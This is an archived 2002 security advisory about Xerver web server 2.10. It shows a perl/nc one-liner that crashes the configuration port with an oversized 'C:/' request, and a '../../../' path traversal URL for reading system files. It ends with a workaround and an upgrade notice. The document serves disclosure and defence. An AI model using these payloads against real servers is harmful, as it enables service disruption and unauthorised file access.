TUCoPS :: Web :: Servers :: web5177.htm

Xerver web server file disclosure & DoS attack
9th Mar 2002 [SBWID-5177]
COMMAND

	Xerver we server file disclosure & DoS attack

SYSTEMS AFFECTED

	Xerver 2.10

PROBLEM

	Alex Hernandez [al3xhernandez@ureach.com] says :
	

	The port 32123 is used for server configuration, you  may  crash  it  by
	calling the C: drive several times :
	

	http://localhost:32123 

	$ printf \"GET /`perl -e \'print \"C:/\"x500000\'`\\r\\n\\r\\n\" |nc -vvn

	127.0.0.1 32123

	

	

	You may also access system files:
	

	http://localhost/unix/ALEX/Xerver2.10/../../../ 

	

SOLUTION

	Workaround: restrict incriminated files and directories
	

	 Update (14 March 2002)

	 ======

	

	Xerver 2.20 available at [http://www.JavaScript.nu]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH